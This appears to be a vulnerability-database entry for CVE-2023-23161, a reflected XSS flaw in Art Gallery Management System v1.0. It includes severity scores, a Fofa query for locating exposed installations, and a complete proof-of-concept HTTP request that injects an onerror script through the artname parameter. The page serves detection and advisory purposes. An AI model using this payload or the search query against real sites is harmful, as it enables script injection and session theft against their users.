🔙 목록으로 돌아가기

CVE-2023-23161: Art Gallery Management System Project v1.0 - Cross-Site Scripting

TitleArt Gallery Management System Project v1.0 - Cross-Site Scripting
Authorctflearner
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.07984
CVE IDCVE-2023-23161
CWE IDCWE-79
Fofa Querytitle="Art Gallery Management System"title="art gallery management system"
Tags cve2023 cve packetstorm art gallery xss art_gallery_management_system_project phpgurukul vuln

🔍 Vulnerability Description

A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.

🌐 HTTP Request

GET /product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23161.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-23161.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A